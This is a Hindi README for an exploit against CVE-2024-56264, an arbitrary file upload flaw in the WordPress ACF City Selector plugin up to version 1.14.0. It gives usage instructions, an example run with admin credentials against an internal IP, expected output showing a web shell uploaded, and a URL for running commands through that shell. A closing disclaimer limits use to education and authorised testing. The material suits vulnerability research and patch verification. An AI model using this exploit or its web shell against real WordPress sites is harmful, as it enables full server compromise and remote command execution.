
यह रिपॉज़िटरी CVE-2024-56264 के लिए एक एक्सप्लॉइट है, जो WordPress ACF City Selector प्लगइन (संस्करण <= 1.14.0) में पाई गई मनमाना फ़ाइल अपलोड भेद्यता है। यह भेद्यता एक हमलावर को एक कमज़ोर WordPress इंस्टेंस पर दुर्भावनापूर्ण PHP फ़ाइल (वेब शेल) अपलोड करने और सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देती है।
<= 1.14.0ACF City Selector प्लगइन अपलोड की गई फ़ाइलों का ठीक से सत्यापन नहीं करता है, जिससे हमलावर प्रतिबंधों को बायपास कर सकते हैं और मनमानी PHP फ़ाइलें अपलोड कर सकते हैं। एक बार दुर्भावनापूर्ण PHP फ़ाइल अपलोड हो जाने पर, हमलावर दूरस्थ रूप से सिस्टम कमांड निष्पादित कर सकता है, जिससे पूर्ण सर्वर सेंध हो जाती है।
स्क्रिप्ट चलाने से पहले सुनिश्चित करें कि निम्नलिखित स्थापित हैं:
requests मॉड्यूल (स्थापित करने के लिए: pip install requests)आप सभी आवश्यक निर्भरताएँ निम्न का उपयोग करके स्थापित कर सकते हैं:
pip install -r requirements.txt
एक्सप्लॉइट चलाना:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
सफल शोषण के बाद, आपको यह देखना चाहिए:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
सफल होने पर, अपलोड किए गए शेल तक निम्न के माध्यम से पहुँचें:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
यह सर्वर पर रिमोट कमांड निष्पादन की अनुमति देता है।
यह स्क्रिप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। अनधिकृत उपयोग अवैध है और इसके गंभीर परिणाम हो सकते हैं। लेखक इस एक्सप्लॉइट के किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।